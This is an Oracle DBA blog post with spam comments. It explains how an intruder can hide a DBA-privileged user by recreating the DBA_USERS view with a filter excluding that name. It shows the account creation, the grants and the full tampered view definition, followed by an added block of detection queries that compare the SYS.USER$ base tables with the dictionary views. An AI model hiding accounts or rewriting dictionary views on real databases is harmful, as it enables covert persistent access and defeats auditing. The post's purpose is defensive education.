Coskan’s Approach to Oracle

January 29, 2007

What if DBA views are not reliable ??

Filed under: Security — coskan @ 12:13 pm

Suppose that you are the DBA of a big corporation with many DB users.

One day you query v$session and you see a username HACKER.

Who is this?

First you look in TOAD and see nothing about user HACKER.

Then you query dba_users

and you see nothing about user HACKER.

Where did this user come from? Why can't you see him?

The answer is below.

13:04:40 SQL> create user hacker identified by hacker;

User created.

13:05:50 SQL> grant create session to hacker;

Grant succeeded.

13:05:58 SQL> grant dba to hacker;

Grant succeeded.

13:12:33 SQL> select username from dba_users where username='HACKER';

no rows selected

but

13:14:23 SQL> select name from user$ where name = 'HACKER';

NAME
------------------------------
HACKER

1 row selected.

The answer can be read between the lines:

CREATE OR REPLACE VIEW DBA_USERS
(USERNAME, USER_ID, PASSWORD, ACCOUNT_STATUS, LOCK_DATE, EXPIRY_DATE,
DEFAULT_TABLESPACE, TEMPORARY_TABLESPACE, CREATED, PROFILE,
INITIAL_RSRC_CONSUMER_GROUP, EXTERNAL_NAME)
AS
select u.name, u.user#, u.password, m.status,
decode(u.astatus, 4, u.ltime, 5, u.ltime, 6, u.ltime,
8, u.ltime, 9, u.ltime, 10, u.ltime, to_date(NULL)),
decode(u.astatus, 1, u.exptime, 2, u.exptime, 5, u.exptime,
6, u.exptime, 9, u.exptime, 10, u.exptime,
decode(u.ptime, '', to_date(NULL),
decode(pr.limit#, 2147483647, to_date(NULL),
decode(pr.limit#, 0,
decode(dp.limit#, 2147483647, to_date(NULL), u.ptime +
dp.limit#/86400),
u.ptime + pr.limit#/86400)))),
dts.name, tts.name, u.ctime, p.name,
nvl(cgm.consumer_group, 'DEFAULT_CONSUMER_GROUP'),
u.ext_username
from sys.user$ u left outer join sys.resource_group_mapping$ cgm
on (cgm.attribute = 'ORACLE_USER' and cgm.status = 'ACTIVE' and
cgm.value = u.name),
sys.ts$ dts, sys.ts$ tts, sys.profname$ p,
sys.user_astatus_map m, sys.profile$ pr, sys.profile$ dp
where u.datats# = dts.ts#
and u.resource$ = p.profile#
and u.tempts# = tts.ts#
and u.astatus = m.status#
and u.type# = 1
and u.resource$ = pr.profile#
and dp.profile# = 0
and dp.type#=1
and dp.resource#=1
and pr.type# = 1
and pr.resource# = 1
and u.name <> 'HACKER'
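The demonstration above and the doctored view definition suggest the checks a DBA would run to catch this. The script below is an added example, not from the original post or from Steve Callan's article: it cross-checks the SYS.USER$ base table against the DBA_USERS view (and, going one step further than the post, SYS.USER$ roles against DBA_ROLES), lists sessions whose username the view does not report, and then looks at the DBA_USERS view object itself, first through the dictionary views and then through the SYS.OBJ$ and SYS.VIEW$ base tables in case the dictionary views have been tampered with too. All object and column names are standard Oracle data dictionary objects; the script assumes it is run in SQL*Plus as SYS or as a user with SELECT on the SYS.* base tables.

```sql
-- Added example (not from the original post). Run as SYS in SQL*Plus.
set long 20000
set pagesize 200
set linesize 160

-- 1. Users present in the base table but missing from DBA_USERS.
--    type# 1 = user, type# 0 = role. Normal result: no rows.
--    Any row means the view filters an account it should report.
select u.name
from   sys.user$ u
where  u.type# = 1
minus
select d.username
from   dba_users d;

-- 2. Same idea for roles: DBA_ROLES is also built on SYS.USER$.
select u.name
from   sys.user$ u
where  u.type# = 0
minus
select r.role
from   dba_roles r;

-- 3. The scenario from the post: connected sessions whose username
--    the DBA_USERS view does not know about.
select s.sid, s.serial#, s.username, s.osuser, s.machine, s.logon_time
from   v$session s
where  s.username is not null
and    s.username not in (select d.username from dba_users d);

-- 4. When was the DBA_USERS view last (re)created, and what does it
--    say today? Compare LAST_DDL_TIME with CREATED, and compare TEXT
--    with the shipped definition in $ORACLE_HOME/rdbms/admin.
select o.object_name, o.object_type, o.created, o.last_ddl_time, o.status
from   dba_objects o
where  o.owner = 'SYS'
and    o.object_name = 'DBA_USERS';

select v.text
from   dba_views v
where  v.owner = 'SYS'
and    v.view_name = 'DBA_USERS';

-- 5. The same two facts read from the base tables, so the answer does
--    not depend on DBA_OBJECTS / DBA_VIEWS being intact either.
--    owner# 0 = SYS, type# 4 = VIEW; mtime is the last modification time.
select o.name, o.ctime, o.mtime, v.text
from   sys.obj$  o,
       sys.view$ v
where  v.obj#   = o.obj#
and    o.owner# = 0
and    o.name   = 'DBA_USERS'
and    o.type#  = 4;
```

Queries 1 to 3 are cheap enough to schedule regularly and alert on any row returned; query 5 is the one that actually follows the post's advice, since it reads the view text and modification time from the base tables rather than from yet another view that the same DBA privilege could have rewritten.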

Thanks, Steve Callan, for informing us about the situation above.

http://www.dbasupport.com/oracle/ora10g/hackers.shtml

What I have learned today:

If you want to be a real DBA, look behind the VIEWS.

Security Comes First

Security First


2 Comments »

  1. Wow, amazing blog layout! How long have you been blogging for?
    you made blogging look easy. The overall look of your site is fantastic, let alone the
    content!

    Comment by epson printer repair — September 3, 2014 @ 3:21 am

  2. Hiya! I know this is kinda off topic but I’d figured I’d ask.
    Would you be interested in trading links or maybe guest writing
    a blog article or vice-versa? My site goes over a lot of the same
    subjects as yours and I believe we could greatly benefit from
    each other. If you might be interested feel free to shoot me an email.

    I look forward to hearing from you! Wonderful blog by the way!

    Comment by Disc Jockey — September 10, 2014 @ 3:04 pm

